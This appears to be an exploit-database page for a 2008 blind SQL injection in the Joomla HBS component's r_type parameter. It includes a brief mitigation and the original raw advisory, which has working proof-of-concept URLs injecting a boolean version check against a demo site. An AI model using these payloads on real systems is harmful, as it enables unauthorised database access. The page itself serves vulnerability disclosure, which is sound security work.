header-logo
Suggest Exploit
vendor:
Joomla HBS
by:
boom3rang
7.5
CVSS
HIGH
Blind SQL-injection
89
CWE
Product Name: Joomla HBS
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:joomlahbs:joomla_hbs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_hbssearch(r_type) Blind SQL-injection

Joomla Component com_hbssearch(r_type) is vulnerable to Blind SQL-injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter. This can be used to extract sensitive information from the database.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

#############################################################
Joomla Component com_hbssearch(r_type) Blind SQL-injection
#############################################################


###################################################
#[~] Author :  boom3rang 
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
----------------------------------------
#[!] <author>Joomla HBS</author>
#[!] <client>Administrator</client>
#[!] <authorEmail>dev@joomlahbs.com</authorEmail>
#[!] <authorUrl>http://joomlahbs.com</authorUrl>
#[!] <version>1.0.0</version>
###################################################

Example:
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]


LiveDEMO:

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54    -->FALSE

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54    -->TRUE


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-21]